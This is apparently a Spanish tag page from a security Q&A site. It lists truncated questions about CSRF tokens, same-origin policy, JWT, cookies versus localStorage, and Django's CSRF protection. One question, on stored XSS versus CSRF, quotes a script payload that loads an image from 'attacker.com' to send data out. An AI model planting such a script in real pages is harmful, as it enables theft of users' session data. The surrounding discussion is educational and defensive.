Preguntas con etiqueta 'csrf'

preguntas con etiqueta
2
respuestas

¿ASP.NET Viewstate previene implícitamente los ataques CSRF? ¿Qué significa esto para MVC?

Si se envía un estado de vista ASP.NET cifrado con cada formulario y el control POST, ¿significa que ASP.NET es menos vulnerable a CSRF que otras soluciones con esto? ¿Cuál es el alcance y la limitación de esa protección? Dado que AntiForg...
hecha 08.11.2011 - 08:23
1
respuesta

¿Por qué las solicitudes Ajax son vulnerables a los ataques CSRF si se aplica la política del mismo origen?

Lo que sé sobre CSRF es que un sitio web malicioso engaña a un usuario normal para que envíe una solicitud a un sitio web de confianza mediante un formulario. Entiendo que es posible porque podemos publicar formularios en diferentes dominios....
hecha 26.05.2014 - 16:46
2
respuestas

¿Por qué los navegadores permiten que los sitios web públicos ataquen los sitios de intranet?

Cuando estoy visitando un sitio web en Internet público, el sitio web puede hacer que mi navegador envíe solicitudes a una dirección IP local (como 10.0.0.1). Esto se puede usar para atacar sitios web internos, por ejemplo, a través de Ataques C...
hecha 07.04.2013 - 09:29
5
respuestas

protección CSRF con ID de sesión

Para protegerme contra CSRF, ¿no podría mi javascript de página simplemente insertar dinámicamente el id de sesión de la cookie en el cuerpo de cada solicitud HTTP justo antes de que se envíe? El servidor simplemente validaría eso (valor reci...
hecha 14.05.2013 - 10:28
2
respuestas

¿Necesito el token CSRF si estoy usando Bearer JWT?

Contexto : el sitio angular está alojado en S3 detrás de CloudFront, separado del servidor Express que se usa como API y casi todas las solicitudes son XMLHttpRequests. Todas las solicitudes se envían sin cookies (con credenciales = falso por d...
hecha 29.09.2017 - 14:25
2
respuestas

¿Por qué se considera que las cookies son más seguras contra XSS?

Este artículo trata sobre el almacenamiento de tokens de sesión en una cookie vs en localStorage: enlace El artículo dice:    Las cookies, cuando se usan con la marca de cookie HttpOnly, no son accesibles   a través de JavaScript, y son...
hecha 09.03.2016 - 10:21
3
respuestas

tokens basados en sesión de cookie CSRF

Generaré un token CSRF y lo incluiré en un campo de formulario oculto. Al recibir la solicitud, compararé el valor del formulario con el valor almacenado en la sesión del usuario o en una cookie. ¿Todavía se considera aceptable desde una pers...
hecha 23.08.2012 - 16:16
1
respuesta

¿Por qué no puedes robar el token del sincronizador para realizar CSRF? [duplicar]

Estoy leyendo sobre CSRF y encontré tokens de sincronizador. No entiendo por qué no puedes hacer un CSRF para obtener el token para hacer un CSRF real. Ejemplo: bank.com tiene una forma como esta en https://bank.com/transfer :...
hecha 26.07.2015 - 20:10
2
respuestas

Tipo 2 XSS vs CSRF

Al tratar de crear una comprensión completa de XSS y CSRF, tengo claro que un tipo 2 xss implica un exploit que es persistente en el servidor. por ejemplo <SCRIPT type="text/javascript"> new Image().src = 'http://www.attacker.com/evil...
hecha 12.05.2013 - 09:10
2
respuestas

¿Es suficiente la protección CSRF incorporada de Django?

Django establece un token de protección CSRF en la máquina del usuario a través de una cookie. A continuación, solicita el token en las solicitudes POST. Si estos dos no coinciden, devuelve un 403. Si cambio manualmente tanto la cookie como e...
hecha 17.12.2013 - 20:49